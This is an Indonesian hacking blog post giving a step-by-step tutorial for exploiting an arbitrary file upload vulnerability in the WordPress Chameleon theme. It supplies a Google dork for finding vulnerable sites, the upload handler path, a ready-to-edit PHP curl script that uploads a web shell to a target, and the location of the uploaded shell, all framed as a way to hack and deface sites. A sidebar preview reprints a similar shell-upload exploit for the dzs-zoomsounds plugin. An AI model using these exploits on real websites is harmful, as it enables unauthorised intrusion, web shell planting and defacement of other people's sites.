Skip to main content

Tutorial WordPress Chameleon theme Arbitary File Upload

By
Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw
baru ketemu lagi >.< maaf efek lebaran + liburan... *lupa ngeBlog xixihi

kali ini Nue akan share Exploit WP Chameleon theme Arbitary File Upload, etthoo,, ini exploit lama loh ..
hahaha iseng2 aja share kali aja masih crotz 

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v )



langsung aja intip tutornya

Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:/wp-content/themes/cameleon/

2).Jika Ketemu Masukan Exploit
/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php



3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}



4).Buat File Baru Berekstensi .php Contoh cameleon.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn cameleon.php tadi :D

<?php
$uploadfile="namashellsobat.php";
$ch = curl_init("http://targetsobat.co.li/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


5).Aktifkan XAMPP Klik Start Pada Apache
6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"

7).Ketik:
cd C:/xampp/php
php cameleon.php

jika berhasil akan muncul tulisan success;true dan letak shell sobat..




Shell Akses: /wp-content/uploads/tahun/bulan/namashell.php 


done 

Hahahaha Sekian tutorial kali ini.
numpang ngiklan..
Download MiniGames Android TKJ JumpMan.
<re/code> By: TKJ Cyber Art
Link:
Google Drive
sharebeast

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy wordpress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: irfansyahputra Blog


./Nuenomaru



















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Labels:

Comments

Post a Comment

Popular posts from this blog

How to Install CloudSim in Ubuntu (in 3 easy steps)

By
The contents of this DIY has been tested on Ubuntu 12.04 LTS x64 with CloudSim 3.0.3 beta and JDK8u11 x64. It should work similarly on other distros of Ubuntu and for different version of JDK as long as you use Java version 1.5 or newer. The text shown in RED in the DIY represents the values that will differ depending upon your JDK version and locations. CloudSim is a framework for modelling and simulating cloud computing infrastructure and services. In this DIY we will see how to install CloudSim in Windows easily and efficiently. A more detailed description, APIs and research papers related to CloudSim can be found here . Let us begin. Step 1: Setting up the Prerequisites 1. First of all we need to download the CloudSim and latest version of the Java Development Toolkit (JDK). CloudSim can be found here . 2. CloudSim requires a working Java installation. So, open up a terminal and run the following 1 sudo add-apt-repository ppa:webupd8team/java 2 sudo apt-get...
Post a Comment
Read more

WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload Vulnerability

By
################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS,          array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...
Post a Comment
Read more

How To Add or Remove System Icons From The Kali Linux Desktop

By
When Kali Linux is started, there are always one or more system icons on the desktop. “Computer” is usually a default icon. However, some people might like to remove this icon and/or add other icons like the famous “Trash” icon. All the other tutorials will tell you to use the Linux, “gconfig-editor,” but Kali Linux does not have this system editor! I believe I am the only one who knows of a way to do this, so let me share my knowledge in this simple tutorial. Step one: Start and login to Kali Linux using your account or the “root” account. Step two: Open the main menu. Hover your mouse on “System Tools,” and click on “dconf Editor.” After a few seconds, the dconf Editor will open. Now all you have to do is browse to the correct category and set the options. Step three: When the dconf Editor window opens, click on the plus sign next to “org” (located in the left pane). Step four: Now click the plus sign next to “gnome.” Step five: Scroll down the list in the left pan...
Post a Comment
Read more